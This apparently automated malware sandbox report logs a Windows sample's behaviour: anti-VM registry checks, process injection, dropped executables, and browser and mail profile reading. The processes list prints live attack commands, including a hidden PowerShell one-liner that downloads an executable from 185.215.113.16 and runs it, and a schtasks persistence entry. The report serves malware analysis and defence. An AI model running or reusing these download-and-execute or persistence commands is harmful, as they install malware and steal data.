| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe | N/A |
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Checks installed software on the system
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3900 set thread context of 3604 | N/A | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe |
| PID 5240 set thread context of 5128 | N/A | C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe | C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133850860889933168" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\quarantine\am_no.bat"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\quarantine\am_no.bat" any_word
C:\Windows\system32\timeout.exe
timeout /t 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\system32\schtasks.exe
schtasks /create /tn "ZDWezmacBOG" /tr "mshta \"C:\Temp\DWmIMSN8O.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\system32\mshta.exe
mshta "C:\Temp\DWmIMSN8O.hta"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
"C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe"
C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
"C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3900 -ip 3900
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3900 -s 800
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe
"C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff952f5cc40,0x7ff952f5cc4c,0x7ff952f5cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1972,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1968 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1956,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2008 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2272,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2496 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3200,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3220 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3228,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3264 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4176,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4536 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4708,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3644 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4768,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4780 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4844,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4832 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe
"C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4980,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4992 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5136,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5024 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4996,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5008 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5012,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5068 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5092,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5088 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5240,i,12143925258121534355,4169434266017795774,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5184 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe
"C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff952f646f8,0x7ff952f64708,0x7ff952f64718
C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe
"C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5240 -ip 5240
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 788
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,16288525578568117271,9903415758202988459,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,16288525578568117271,9903415758202988459,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,16288525578568117271,9903415758202988459,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2740 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,16288525578568117271,9903415758202988459,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,16288525578568117271,9903415758202988459,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,16288525578568117271,9903415758202988459,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,16288525578568117271,9903415758202988459,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3996 /prefetch:1
Network
Files
Analysis: behavioral18
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win7-20241023-en
Max time kernel
121s
Max time network
128s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c087871aa688db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446774329" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
